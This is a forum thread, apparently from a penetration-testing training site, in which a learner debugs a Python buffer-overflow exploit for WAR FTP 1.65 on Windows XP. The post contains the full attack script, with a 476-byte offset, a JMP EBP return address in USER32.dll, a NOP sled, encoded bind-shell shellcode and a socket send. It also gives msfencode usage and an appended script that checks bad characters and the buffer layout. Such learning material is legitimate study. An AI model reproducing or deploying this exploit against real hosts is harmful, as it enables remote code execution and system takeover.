Frustrated with Shellcode

    • #5236
      N3WB134444
      Participant

      I started coding the WAR FTP 1.65 Remote Code exploit in Python to exploit a Win XP SP2 machine this morning and it's still not finished :(. It went fine up until the point that the shellcode had to be added.

      I managed to overwrite EIP with my A's and eventually with a JMP EBP from my USER32.dll file, and even managed to put in my breakpoints where my shellcode was supposed to go; everything worked with OllyDbg. But I kept failing at the shellcode which I generated with msfpayload. I spent the rest of the day playing around with different shellcodes trying to get the blasted thing to work. I played with different connecting shellcodes, VNC injects, encoders and even filtering out bad characters, padding with NOPs, and the blasted thing still wouldn't work.

      Could anybody please provide me with any tips for shellcode? I understand the difference between types of shells, e.g. bind and reverse, but the different encoders are throwing me off. Could I have just missed a bad character somewhere? Any help would be much appreciated, thanks 🙂

    • #33202
      n1p
      Participant

      Better late than never 😉 I normally use the alpha_upper encoder, which should remove bad characters. I remember having problems with the shikata_ga_nai encoder and removing bad characters whilst exploiting a program previously.

      msfencode -e x86/alpha_upper -t c

      Paste that into your exploit code and see. Also happy to look at your code if necessary.

      http://seclists.org/metasploit/2006/q4/51 – possibly related

      cheers

    • #33203
      N3WB134444
      Participant

      Thanks very much for your help and reply. I will give it a go and let you know how it turns out.

      Cheers

    • #33204
      n1p
      Participant

      No problem, do let us know how it turns out  😛

    • #33205
      N3WB134444
      Participant

      Well, I tried alpha_upper encoding, reviewed my code and couldn't see anything that terminates the string, so here is my code.

      EIP was overwritten at the 476th byte.

      I used JMP EBP, which I discovered in USER32.dll, as it had more room for shellcode.

      I used a ./msfpayload windows/shell_bind_tcp payload with the x86/alpha encoder.

      Any insight that you could provide would be most appreciated, thanks.

      #!/usr/bin/env python3
      import socket

      s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

      # windows/shell_bind_tcp from msfpayload, run through the x86/alpha_upper encoder
      shell = (b"\x89\xe6\xd9\xc3\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
               b"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
               b"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
               b"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
               b"\x50\x38\x41\x43\x4a\x4a\x49\x41\x41")

      # JMP EBP in USER32.dll at 0x77D5A432, written little-endian
      ret = b"\x32\xa4\xd5\x77"

      # 476 bytes of filler up to the saved EIP, then the return address,
      # a 32-byte NOP sled and the shellcode
      buffer = b"\x41" * 476 + ret + b"\x90" * 16 + b"\x90" * 16 + shell

      print("\nSending evil buffer...")
      s.connect(("10.16.250.4", 21))
      data = s.recv(1024)          # banner
      s.send(b"USER anonymous" + buffer + b"\r\n")
      data = s.recv(1024)
      s.close()
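Two checks worth running on a buffer like the one above before it goes over the wire, as an added example (not code from the thread): a bad-character scan of the whole payload, and a layout check that the return address really sits at the expected offset in little-endian form with the NOP sled directly behind it. It also generates the classic bad-character test pattern (every byte except the ones already known to be bad) to send in place of the shellcode and compare against memory in the debugger. The bad-character set (NUL, CR, LF and space for an FTP USER argument) is an assumption for the example and should be confirmed in OllyDbg; the 476-byte offset and 0x77D5A432 address are the thread's own values, and the decoder stub bytes are the ones posted above, used only as sample input.

```python
import struct

# Assumed bad characters for an FTP USER argument: NUL ends a C string,
# CR/LF end the command line, space separates the argument. Confirm in
# the debugger for the real target; this set is an assumption.
BAD_CHARS = b"\x00\x0a\x0d\x20"

# Decoder stub bytes as posted in the thread (truncated there as well),
# embedded here only as sample input for the scan.
POSTED_STUB = (b"\x89\xe6\xd9\xc3\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
               b"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
               b"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
               b"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
               b"\x50\x38\x41\x43\x4a\x4a\x49\x41\x41")


def badchar_test_pattern(bad: bytes = BAD_CHARS) -> bytes:
    """Every byte value 0x01..0xff except those already known to be bad.

    Send this where the shellcode will land, then compare the bytes in
    memory (follow ESP in the dump) against the pattern: the first byte
    that is altered or missing is a bad character to add to `bad`.
    """
    return bytes(b for b in range(1, 256) if b not in bad)


def find_bad_chars(payload: bytes, bad: bytes = BAD_CHARS) -> list:
    """Return (offset, value) for every bad byte found in the payload."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def build_buffer(offset: int, ret_addr: int, shellcode: bytes, nops: int = 32) -> bytes:
    """Filler up to the saved EIP, little-endian return address, NOP sled, shellcode."""
    return b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nops + shellcode


def check_buffer(buffer: bytes, offset: int, ret_addr: int, bad: bytes = BAD_CHARS) -> dict:
    """Pre-flight checks: does the word at `offset` decode to the intended
    address, does the NOP sled start right after it, and is any bad byte
    present anywhere in the buffer (return address and sled included)?"""
    eip = struct.unpack("<I", buffer[offset:offset + 4])[0]
    return {
        "eip_ok": eip == ret_addr,
        "eip_value": eip,
        "sled_starts_at": offset + 4 if buffer[offset + 4] == 0x90 else None,
        "bad_chars": find_bad_chars(buffer, bad),
    }


if __name__ == "__main__":
    buf = build_buffer(476, 0x77D5A432, POSTED_STUB)
    print(check_buffer(buf, 476, 0x77D5A432))
    # Constructed raw (unencoded) payload ending in a NUL, to show the scan
    # flagging the byte that would terminate the USER argument.
    print(find_bad_chars(b"\x31\xc0\x50\x68\x63\x6d\x64\x00"))
    print(len(badchar_test_pattern()))
```

The scan covers the entire buffer rather than just the shellcode, because a return address or filler byte can contain a bad character just as easily as the payload can; an alphanumeric encoder only cleans the payload it wraps, not the GetPC stub it prepends or the address you chose.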

Copyright ©2021 Caendra, Inc.
